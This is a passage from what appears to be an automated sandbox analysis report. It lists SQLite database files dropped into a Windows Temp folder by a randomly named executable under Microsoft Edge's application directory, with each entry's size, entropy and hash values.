                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\jMH4cYu9Zo

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\jZOQDTUZUv

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\ju1yCpSOIs

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\kQMv3RZqG6

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\kcLSD5osOv

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\khztPbKYo5

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\kzmaawoMZG

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\l5Un2quyrK

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\lKAmMyCUHv

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\m0Usk5iqlO

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\mNopGdCbHO

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\mQuKQWjbQa

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\mkVIqJPfqS

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\mqXM6jDg6Q

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\nSeo4ql17G

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\nh9eRiODwz

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\nmUJAXdmjs

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\nnwI58A0Ax

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\o2cUFO2Ccr

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\o8JfvUgNg5

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
